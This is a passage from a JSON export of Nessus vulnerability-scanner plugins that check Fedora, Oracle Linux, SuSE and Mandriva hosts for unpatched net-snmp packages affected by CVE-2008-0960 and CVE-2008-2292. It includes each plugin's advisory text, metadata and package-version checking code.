"scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2008-06-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:net-snmp"], "id": "FEDORA_2008-5218.NASL", "href": "https://www.tenable.com/plugins/nessus/33147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-5218.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33147);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_bugtraq_id(29212, 29623);\n script_xref(name:\"FEDORA\", value:\"2008-5218\");\n\n script_name(english:\"Fedora 8 : net-snmp-5.4.1-7.fc8 (2008-5218)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Tue Jun 10 2008 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-7\n\n - fix various flaws (CVE-2008-2292 CVE-2008-0960)\n\n - Thu Feb 14 2008 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-6\n\n - fixing ipNetToMediaNetAddress to show IP address\n (#432780)\n\n - Thu Nov 15 2007 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-5\n\n - added procps to build dependencies (#380321)\n\n - fix crash on reading xen interfaces (#386611)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=447262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=447974\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-June/011202.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c15547\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected net-snmp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"net-snmp-5.4.1-7.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-snmp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:10", "description": "From Red Hat Security Advisory 2008:0529 :\n\nUpdated net-snmp packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Simple Network Management Protocol (SNMP) is a protocol used for\nnetwork management.\n\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)\n\nAll users of net-snmp should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : net-snmp (ELSA-2008-0529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:net-snmp-perl", "p-cpe:/a:oracle:linux:net-snmp-utils", "p-cpe:/a:oracle:linux:net-snmp", "p-cpe:/a:oracle:linux:net-snmp-devel", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:net-snmp-libs", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2008-0529.NASL", "href": "https://www.tenable.com/plugins/nessus/67708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0529 and \n# Oracle Linux Security Advisory ELSA-2008-0529 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67708);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_bugtraq_id(29212, 29623);\n script_xref(name:\"RHSA\", value:\"2008:0529\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : net-snmp (ELSA-2008-0529)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0529 :\n\nUpdated net-snmp packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Simple Network Management Protocol (SNMP) is a protocol used for\nnetwork management.\n\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)\n\nAll users of net-snmp should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-June/000636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-June/000637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-June/000638.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected net-snmp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:net-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:net-snmp-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:net-snmp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:net-snmp-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"net-snmp-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"net-snmp-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"net-snmp-devel-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"net-snmp-devel-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"net-snmp-libs-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"net-snmp-libs-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"net-snmp-perl-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"net-snmp-perl-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"net-snmp-utils-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"net-snmp-utils-5.0.9-2.30E.24\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"net-snmp-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"net-snmp-devel-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"net-snmp-libs-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"net-snmp-perl-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"net-snmp-utils-5.1.2-11.el4_6.11.3\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"net-snmp-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"net-snmp-devel-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"net-snmp-libs-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"net-snmp-perl-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"net-snmp-utils-5.3.1-24.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-snmp / net-snmp-devel / net-snmp-libs / net-snmp-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:48", "description": "This security update of net-snmp fixes a denial of service\nvulnerability (CVE-2008-2292), an authentication bypass\n(CVE-2008-0960) and several memory leaks.\n\nIn addition net-snmp was patched to allow customization of the agent\naddress set.", "edition": 24, "published": "2008-08-01T00:00:00", "title": "SuSE 10 Security Update : net-snmp (ZYPP Patch Number 5422)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2008-08-01T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_NET-SNMP-5422.NASL", "href": "https://www.tenable.com/plugins/nessus/33787", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33787);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n\n script_name(english:\"SuSE 10 Security Update : net-snmp (ZYPP Patch Number 5422)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update of net-snmp fixes a denial of service\nvulnerability (CVE-2008-2292), an authentication bypass\n(CVE-2008-0960) and several memory leaks.\n\nIn addition net-snmp was patched to allow customization of the agent\naddress set.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0960.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2292.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5422.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"net-snmp-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"net-snmp-devel-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"perl-SNMP-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"net-snmp-32bit-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"net-snmp-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"net-snmp-devel-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"perl-SNMP-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"net-snmp-32bit-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"net-snmp-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"net-snmp-devel-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"perl-SNMP-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"net-snmp-32bit-5.3.0.1-25.24.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"net-snmp-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"net-snmp-devel-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"perl-SNMP-5.3.0.1-25.26\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"net-snmp-32bit-5.3.0.1-25.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:53", "description": "A vulnerability was found in how Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could\nexploit this flaw to spoof an authenticated SNMPv3 packet\n(CVE-2008-0960).\n\nA buffer overflow was found in the perl bindings for Net-SNMP that\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP perl modules to connect to a malicious SNMP agent\n(CVE-2008-2292).\n\nThe updated packages have been patched to prevent these issues.", "edition": 26, "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : net-snmp (MDVSA-2008:118)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:perl-NetSNMP", "p-cpe:/a:mandriva:linux:libnet-snmp10-static-devel", "p-cpe:/a:mandriva:linux:lib64net-snmp10-devel", "p-cpe:/a:mandriva:linux:net-snmp-mibs", "cpe:/o:mandriva:linux:2007.1", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:net-snmp-trapd", "p-cpe:/a:mandriva:linux:lib64net-snmp10", "p-cpe:/a:mandriva:linux:libnet-snmp-devel", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:libnet-snmp10-devel", "p-cpe:/a:mandriva:linux:net-snmp-tkmib", "p-cpe:/a:mandriva:linux:lib64net-snmp10-static-devel", "p-cpe:/a:mandriva:linux:net-snmp", "p-cpe:/a:mandriva:linux:libnet-snmp-static-devel", "p-cpe:/a:mandriva:linux:lib64net-snmp-devel", "p-cpe:/a:mandriva:linux:libnet-snmp10", "p-cpe:/a:mandriva:linux:libnet-snmp15", "p-cpe:/a:mandriva:linux:lib64net-snmp-static-devel", "p-cpe:/a:mandriva:linux:lib64net-snmp15", "p-cpe:/a:mandriva:linux:net-snmp-utils"], "id": "MANDRIVA_MDVSA-2008-118.NASL", "href": "https://www.tenable.com/plugins/nessus/37050", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:118. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37050);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_xref(name:\"MDVSA\", value:\"2008:118\");\n\n script_name(english:\"Mandriva Linux Security Advisory : net-snmp (MDVSA-2008:118)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was found in how Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could\nexploit this flaw to spoof an authenticated SNMPv3 packet\n(CVE-2008-0960).\n\nA buffer overflow was found in the perl bindings for Net-SNMP that\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP perl modules to connect to a malicious SNMP agent\n(CVE-2008-2292).\n\nThe updated packages have been patched to prevent these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp10-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64net-snmp15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp10-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libnet-snmp15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:net-snmp-mibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:net-snmp-tkmib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:net-snmp-trapd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:net-snmp-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-NetSNMP\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64net-snmp10-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64net-snmp10-devel-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64net-snmp10-static-devel-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libnet-snmp10-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libnet-snmp10-devel-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libnet-snmp10-static-devel-5.3.1-3.2mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"net-snmp-5.3.1-3.2mdv2007.1\", 